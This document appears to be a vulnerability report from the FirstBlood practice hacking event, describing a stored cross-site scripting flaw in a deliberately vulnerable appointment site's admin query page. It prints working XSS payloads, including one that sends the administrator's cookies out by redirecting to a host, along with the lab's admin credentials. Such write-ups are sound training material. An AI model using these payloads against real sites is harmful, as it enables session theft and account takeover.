FirstBlood-#201Stored XSS on /drpanel/drapi/query.php



On 2021-05-11, 0xblackbird reported:

Hi! I found another stored cross-site scripting issue but this time it's on /drpanel/drapi/query.php?aptid={ID}.

Update

The payload works on every browser, on Firefox it needs a tab change or a click. But on Chrome (Brave browser), it worked right away for me. No user interaction needed.

Steps to reproduce

  • Visit /book-appointment.html and fill in the required details except the first name and last name fields. On these fields, paste in the following payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm%600%60">.

  • Now, simply login using the administrator account by using the following credentials: drAdmin:s2Wpx5zfUvlSZhspJ.
  • On the dashboard, inspect the last appointment and copy the ID.
  • Navigate to /drpanel/drapi/query.php?aptid={ID}, xss should trigger.
  • This is just a simple xss, we can go for account takeover by stealing cookies. Repeat the above steps, only on the first step, change the payload to the following payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="window.location.href='http://localhost/'%2bdocument.cookie">

  • When we now visit /drpanel/drapi/query.php?aptid={ID}, we get redirected to http://localhost/${cookies}

This cookie can later be retrieved by the attacker and by that, fully compromise an administrator account.

Impact

Taking over an account with higher privileges is possible by stealing the cookies. This is because we could execute javascript on the administrator's behalf.

Background

I already had success with custom html tags, that gave me the idea to go for custom tags again. It also worked this time so it's probably a site-wide xss filter issue. Thanks for the fun and realistic challenge! I really like these!

Kind regards, 0xblackbird

P2 High

Endpoint: /drpanel/drapi/query.php?aptid={ID}

Parameter: fname, lname

Payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm`0`">


FirstBlood ID: 10
Vulnerability Type: Stored XSS

When creating an appointment, it is possible to get stored XSS /drapi/query.php via the patients name


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.